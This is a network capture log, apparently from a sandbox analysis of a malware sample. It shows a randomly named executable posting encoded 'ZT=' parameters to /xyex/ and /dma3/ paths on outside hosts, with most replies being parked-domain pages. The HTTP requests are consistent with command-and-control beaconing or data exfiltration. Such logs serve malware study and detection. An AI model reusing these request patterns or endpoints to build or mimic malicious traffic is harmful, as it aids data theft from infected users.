                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                                              Oct 30, 2024 08:12:46.357333899 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjI2MzI5ZjktMWFmOS00MDU4LWIxNTQtMTcwMjJkODMzZTcyIiwicGFnZV90aW1lIjoxNzMwMjcyMz


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              35192.168.2.450042199.59.243.227803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:48.280092001 CET10806OUTPOST /xyex/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.297676.com
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.297676.com
                                                                                                                                                                              Referer: http://www.297676.com/xyex/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 4c 54 48 63 6a 68 77 74 53 61 48 65 38 4c 39 4e 31 76 42 35 36 62 68 71 4b 68 2f 31 52 4d 78 66 46 7a 67 2b 57 64 49 36 72 70 62 75 39 63 33 4e 62 4f 55 73 43 65 34 7a 74 78 75 76 67 6f 33 63 43 44 56 33 61 6f 75 51 79 48 69 52 4c 57 58 69 34 7a 2b 67 79 56 77 35 68 58 67 50 63 6e 31 61 52 32 46 5a 32 33 6a 52 7a 2f 64 49 2f 37 38 31 51 59 6f 32 33 78 47 54 65 35 78 69 69 77 45 4d 50 36 7a 48 4f 67 49 48 73 51 36 6a 4e 70 31 63 64 69 30 50 4c 36 4d 4e 4e 6f 45 6c 54 74 4d 4f 74 74 5a 57 6e 7a 73 4d 30 39 55 65 53 37 53 79 74 42 74 33 76 47 79 77 4a 46 56 30 6c 2b 43 56 32 4d 54 35 55 56 73 75 2b 57 67 64 2b 51 77 61 6a 76 79 5a 67 36 6c 66 77 68 47 48 49 56 6e 30 65 66 6a 67 74 68 52 37 56 64 78 67 45 4c 6c 41 32 68 54 76 47 74 37 39 76 42 51 59 47 6d 38 69 4c 6d 33 41 66 44 6c 35 73 64 72 43 6b 36 78 4b 30 74 59 6f 32 39 35 72 54 32 78 2f 2f 53 4d 51 48 78 62 62 70 4f 39 69 43 39 79 45 4e 6e 75 70 49 63 34 49 71 30 46 41 46 31 78 65 63 55 44 55 34 34 67 4d 51 70 6d 37 48 4e 62 48 2f 42 6c [TRUNCATED]
                                                                                                                                                                              Data Ascii: ZT=LTHcjhwtSaHe8L9N1vB56bhqKh/1RMxfFzg+WdI6rpbu9c3NbOUsCe4ztxuvgo3cCDV3aouQyHiRLWXi4z+gyVw5hXgPcn1aR2FZ23jRz/dI/781QYo23xGTe5xiiwEMP6zHOgIHsQ6jNp1cdi0PL6MNNoElTtMOttZWnzsM09UeS7SytBt3vGywJFV0l+CV2MT5UVsu+Wgd+QwajvyZg6lfwhGHIVn0efjgthR7VdxgELlA2hTvGt79vBQYGm8iLm3AfDl5sdrCk6xK0tYo295rT2x//SMQHxbbpO9iC9yENnupIc4Iq0FAF1xecUDU44gMQpm7HNbH/Bl34aVATbqxczvqg8bzQalqOA97HT/CKndIFh+d6f0hr0LCxVYUmH9aV+ML0VIfiSKCDzw5rv03zguH/y97K87X4eRMdFRu0Yz2xLNb0CEN19A3RkpkQVzPYI0EMjLg266/fmB2TuT928+uuZu6MHgwGZ3PWEjentfOhbUMvUZ80pfKu4BmT51iIbplj3KzDgwmNL03Ahh5/YAafyGzbZm1/0YXX+8mxiDTYakcp7lSE5DcHnKzuXRmSLCPHSpD7W3CfbYhsgqMbLXJ/MbokjKQxlO6FOV5eCPD30CeuPaNbGxsi6CXaxZnVTzn3NMnPvHBc9OjqUqEBaPZMTYYsfapy4phoHKfRDakRBB9ABZ7stWjdZocwIh1WKTz8bUh7+Pq8PRzVGx0ZOan/qCsiWCXn7nbCSeDc2CgKjC/bB6cORdzArAYEoq6aBXpwhCEyYUqbR9VKrXWHpb3tz/Mx2/zd9ZzViSgzQDdnj6QCzmpzawrW4hP5oXa8ykVwrgSX2bJtC7630fqEcienkxGctzH/oz1c/iFAw032zkrKPu9CM3jqXU1njxZMWWNO0nk5EK6pPI8XGtiBUoYdgW0FFu6ZCKpUoaXnQbf2fEdP7G5DFa0Ig1Gd69bq8krJh0uejEuwXG9Bd4N23AqjpKckJaHvsyDEDA4i5h/u [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:12:48.894921064 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:12:47 GMT
                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                              content-length: 1110
                                                                                                                                                                              x-request-id: 22a49152-19cd-400e-b842-6d5c2b1920a9
                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==
                                                                                                                                                                              set-cookie: parking_session=22a49152-19cd-400e-b842-6d5c2b1920a9; expires=Wed, 30 Oct 2024 07:27:48 GMT; path=/
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 76 4d 6b 64 37 30 70 63 61 61 2b 2b 78 50 48 50 45 54 37 6b 38 48 53 39 6f 50 76 75 76 55 41 2b 63 6b 46 55 2b 67 72 44 45 56 73 38 31 73 54 36 49 58 73 71 51 61 59 4d 55 6a 66 50 4f 6d 4e 4c 48 39 44 71 65 56 47 31 6a 64 75 47 39 54 4b 43 33 4e 68 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                                              Oct 30, 2024 08:12:48.894942045 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjJhNDkxNTItMTljZC00MDBlLWI4NDItNmQ1YzJiMTkyMGE5IiwicGFnZV90aW1lIjoxNzMwMjcyMz


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              36192.168.2.450043199.59.243.227803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:50.816328049 CET443OUTGET /xyex/?ZT=GRv8gXQeeb2Gl8ts68dy26JEIDOFTPQDU1Y3CPEivIL54q3aRuVfXNser16Tn8T/OBl4IICKxXKXWQiZ2Uzn7HwRtVNzQ2FbKXtno3vR39Y/zqEhWKkV0ww=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.297676.com
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:12:51.442913055 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:12:51 GMT
                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                              content-length: 1450
                                                                                                                                                                              x-request-id: d9d4d9e9-8ec2-4b87-8190-2d8eda05b12e
                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Bo3DenWrsvk5YA50spX/uELGa989cHoAuxnbur2u8jF1vWV08WsOG1s7ntsGbcSF1M86+E57Ct8bX6DR1mxm8w==
                                                                                                                                                                              set-cookie: parking_session=d9d4d9e9-8ec2-4b87-8190-2d8eda05b12e; expires=Wed, 30 Oct 2024 07:27:51 GMT; path=/
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 42 6f 33 44 65 6e 57 72 73 76 6b 35 59 41 35 30 73 70 58 2f 75 45 4c 47 61 39 38 39 63 48 6f 41 75 78 6e 62 75 72 32 75 38 6a 46 31 76 57 56 30 38 57 73 4f 47 31 73 37 6e 74 73 47 62 63 53 46 31 4d 38 36 2b 45 35 37 43 74 38 62 58 36 44 52 31 6d 78 6d 38 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Bo3DenWrsvk5YA50spX/uELGa989cHoAuxnbur2u8jF1vWV08WsOG1s7ntsGbcSF1M86+E57Ct8bX6DR1mxm8w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                                              Oct 30, 2024 08:12:51.442933083 CET903INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDlkNGQ5ZTktOGVjMi00Yjg3LTgxOTAtMmQ4ZWRhMDViMTJlIiwicGFnZV90aW1lIjoxNzMwMjcyMz


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              37192.168.2.450044217.76.156.252803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:56.739907026 CET704OUTPOST /dma3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cesach.net
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cesach.net
                                                                                                                                                                              Referer: http://www.cesach.net/dma3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 46 6a 6e 76 53 31 58 48 45 44 5a 6f 2f 4d 54 59 47 55 37 44 4f 61 52 34 6a 46 71 68 49 45 7a 33 6e 6b 44 2b 67 68 68 46 75 54 71 4b 41 58 43 6c 77 55 2b 51 31 6f 41 71 57 4d 58 57 4f 63 35 4e 71 6d 35 2b 37 75 32 34 6e 58 4c 6d 72 71 69 50 39 6f 76 47 6e 55 4a 49 65 46 64 41 46 67 63 73 55 45 56 6f 34 64 31 4a 41 47 43 4a 62 78 58 54 6b 33 36 66 6f 72 50 5a 73 55 53 33 5a 37 65 4b 4a 48 74 50 31 74 6c 6f 31 4a 39 4f 54 42 4c 4f 45 69 70 4f 61 68 35 75 33 57 41 39 6c 2b 35 6b 55 54 76 6a 6e 62 58 31 79 32 38 42 78 33 31 64 6b 6b 51 6b 35 75 2f 2b 63 77 78 50 57 35 67 44 6a 51 3d 3d
                                                                                                                                                                              Data Ascii: ZT=FjnvS1XHEDZo/MTYGU7DOaR4jFqhIEz3nkD+ghhFuTqKAXClwU+Q1oAqWMXWOc5Nqm5+7u24nXLmrqiP9ovGnUJIeFdAFgcsUEVo4d1JAGCJbxXTk36forPZsUS3Z7eKJHtP1tlo1J9OTBLOEipOah5u3WA9l+5kUTvjnbX1y28Bx31dkkQk5u/+cwxPW5gDjQ==
                                                                                                                                                                              Oct 30, 2024 08:12:57.609009027 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:57 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              X-ServerIndex: llim604
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f [TRUNCATED]
                                                                                                                                                                              Data Ascii: 1a9b<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.cesach.net</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:12:57.609025955 CET212INData Raw: 3c 68 31 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e
                                                                                                                                                                              Data Ascii: <h1>www.cesach.net</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL--
                                                                                                                                                                              Oct 30, 2024 08:12:57.609038115 CET1236INData Raw: 3e 3c 21 2d 2d 54 45 52 4d 49 4e 41 5f 50 49 45 5f 50 45 52 53 4f 4e 41 4c 2d 2d 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d
                                                                                                                                                                              Data Ascii: >...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header>... end client -->... foot -->...COMIENZA_PIE_POR_DEFECTO--><section class="search"> <div class="center"> <di
                                                                                                                                                                              Oct 30, 2024 08:12:57.609051943 CET1236INData Raw: 63 74 6f 73 20 65 6e 20 6c 61 20 70 61 72 74 65 20 69 6e 66 65 72 69 6f 72 2e 3c 2f 70 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 61 73 69 64 65 3e 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 73 69 6d 70 6c 65 22 3e 0d 0a 20 20
                                                                                                                                                                              Data Ascii: ctos en la parte inferior.</p> </div></aside><section class="simple"> <span>Nuestros Productos</span> <div class="line"> <div class="center"> <a href="https://www.piensasolutions.com/web-sencilla?utm_so
                                                                                                                                                                              Oct 30, 2024 08:12:57.609108925 CET424INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 69 6d 67 73 2f 70 61 72 6b 69 6e 67 2f 69 63 6f 6e 2d 77 65 62 2e 70 6e 67 22 3e 0d 0a 20
                                                                                                                                                                              Data Ascii: <img src="https://piensasolutions.com/imgs/parking/icon-web.png"> <h2>MI P&Aacute;GINA WEB</h2> <p>Dise&ntilde;a tu propia p&aacute;gina web de forma profesional y de una manera r&aacute;pida y s
                                                                                                                                                                              Oct 30, 2024 08:12:57.609122992 CET1236INData Raw: 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6c 69 6e 6b 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 73 6c 22 3e 3c 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73
                                                                                                                                                                              Data Ascii: p;utm_medium=link&amp;utm_campaign=ssl"><article> <img src="https://piensasolutions.com/imgs/parking/icon-ssl-parking.png"> <h2>CERTIFICADO SSL</h2> <p>Confianza y seguridad para tu web. Con u
                                                                                                                                                                              Oct 30, 2024 08:12:57.609217882 CET1236INData Raw: 61 20 64 65 20 70 72 65 73 65 6e 74 61 63 69 26 6f 61 63 75 74 65 3b 6e 20 63 6f 6e 66 69 67 75 72 61 62 6c 65 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 6f 6b 22 3e 3c 2f 69
                                                                                                                                                                              Data Ascii: a de presentaci&oacute;n configurable</li> <li><i class="icon-ok"></i> Directivas "Meta" para mejorar tu posicionamiento SEO</li> <li><i class="icon-ok"></i> Redirecci&oacute;n Web con URL fija</li> <li><
                                                                                                                                                                              Oct 30, 2024 08:12:57.609230042 CET224INData Raw: 22 20 74 69 74 6c 65 3d 22 53 c3 ad 67 75 65 6e 6f 73 20 65 6e 20 47 6f 6f 67 6c 65 2b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 67 2f 69 63 6f 6e 2d 67 70 6c 75 73 2d 73 6d 61 6c 6c 2e
                                                                                                                                                                              Data Ascii: " title="Sguenos en Google+"> <img src="./img/icon-gplus-small.png"></div>Google+</a> </li>--> </ul></footer>...TERMINA_PIE_POR_DEFECTO-->... end foot --></body></html>0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              38192.168.2.450045217.76.156.252803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:59.292188883 CET724OUTPOST /dma3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cesach.net
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cesach.net
                                                                                                                                                                              Referer: http://www.cesach.net/dma3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 46 6a 6e 76 53 31 58 48 45 44 5a 6f 2b 74 44 59 45 33 54 44 66 36 52 37 6e 31 71 68 43 6b 7a 37 6e 6b 66 2b 67 6c 5a 56 75 67 4f 4b 41 31 4b 6c 78 56 2b 51 67 6f 41 71 65 73 58 54 44 38 35 47 71 6d 39 32 37 75 4b 34 6e 58 76 6d 72 6f 36 50 39 66 44 46 6d 45 4a 4f 56 6c 64 65 59 51 63 73 55 45 56 6f 34 5a 64 6a 41 47 36 4a 62 44 44 54 32 44 57 63 33 62 50 61 37 6b 53 33 64 37 65 4f 4a 48 73 61 31 73 70 47 31 4c 56 4f 54 44 44 4f 46 33 64 4e 4e 78 35 6f 34 32 42 69 73 37 49 4f 4e 43 57 7a 6e 39 62 5a 77 6b 49 51 39 52 34 48 31 56 78 7a 72 75 62 4e 42 33 34 37 62 36 64 4b 34 62 57 77 39 6f 50 4b 73 49 6d 34 32 79 63 74 33 35 65 55 4b 43 55 3d
                                                                                                                                                                              Data Ascii: ZT=FjnvS1XHEDZo+tDYE3TDf6R7n1qhCkz7nkf+glZVugOKA1KlxV+QgoAqesXTD85Gqm927uK4nXvmro6P9fDFmEJOVldeYQcsUEVo4ZdjAG6JbDDT2DWc3bPa7kS3d7eOJHsa1spG1LVOTDDOF3dNNx5o42Bis7IONCWzn9bZwkIQ9R4H1VxzrubNB347b6dK4bWw9oPKsIm42yct35eUKCU=
                                                                                                                                                                              Oct 30, 2024 08:13:00.169521093 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:13:00 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              X-ServerIndex: llim603
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
